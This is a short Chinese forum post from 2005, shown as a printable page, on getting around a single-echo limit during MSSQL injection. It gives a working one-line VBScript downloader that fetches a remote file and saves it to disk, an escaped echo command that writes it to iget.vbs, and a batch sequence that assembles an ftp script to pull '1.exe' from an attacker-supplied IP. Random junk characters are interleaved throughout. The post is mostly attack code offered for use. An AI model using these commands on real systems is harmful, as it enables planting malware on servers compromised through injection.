数学建模社区-数学中国
标题:
mssql注射时不可以多次echo的解决办法
[打印本页]
作者:
韩冰
时间:
2005-1-23 13:30
标题:
mssql注射时不可以多次echo的解决办法
<
>解决办法:
, a+ q' Q, g" }+ R5 J+ \
1.iget.vbs一次写入
) m9 a& q! Z6 L7 g0 A
在vbs语句的接触是符号是: 所以我们iget.vbs可以这样写
; Q' e& U2 ~9 v. W, E1 E- n% P( ^
& W# u) s* t. Q9 [/ T( t# y# J
Set x= CreateObject("Microsoft.XMLHTTP"):x.Open "GET",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject("ADODB.Stream"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2
5 o6 Y# h! t) E; j
% Q6 ^/ W p$ e/ c
这样我们可以一次echo成功,echo版本:
5 v/ ^9 B' ~# ~6 s' G5 `6 R7 U
/ @1 }. J& T+ S2 D
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >iget.vbs
% S$ T) \: w; W3 A: h
, `2 B: P( N: B/ L, ]% [7 c; ~) |
: `5 r5 D6 k/ u
2.bat调用ftp脚本的写法(by envymask)
2 N- x0 d0 J: X# P2 a' A: K
( ~5 o5 w7 J G7 a' `
echo ftp>1.vbs
4 B; z e# G* F0 c7 G
echo open ip>2.vbs
3 s0 D& d N5 g# P7 N& M
echo u>3.vbs
0 f' G! t1 T1 u) D& Q
echo s>4.vbs
$ E; p8 y0 D( I3 o6 P' n
echo binary>5.vbs
7 e" g i5 X! q* C. w; i) l
echo get 1.exe>6.vbs
. ]" I# n. M, ?0 b, J9 J+ u0 Z: `
echo bay>7.vbs
' S5 \. Q9 l- `! R3 Y" _
+ x4 \. b" F7 ?" u" [* B
copy 1.vbs+2.vbs+3.vbs+4.vbs+5.vbs+6.vbs+7.vbs new.vbs
# Y$ A ^/ b" S& t
</P>
欢迎光临 数学建模社区-数学中国 (http://www.madio.net/)
Powered by Discuz! X2.5
>解决办法: , a+ q' Q, g" }+ R5 J+ \